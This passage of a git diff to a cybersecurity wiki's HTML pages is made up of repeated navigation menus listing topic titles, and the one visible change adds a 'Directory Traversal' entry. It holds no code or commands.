        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/index.html b/docs/System Internals/index.html index 513572bc..34e7396b 100644 --- a/docs/System Internals/index.html +++ b/docs/System Internals/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/index.html b/docs/index.html index bc2178a6..4051fff2 100644 --- a/docs/index.html +++ b/docs/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
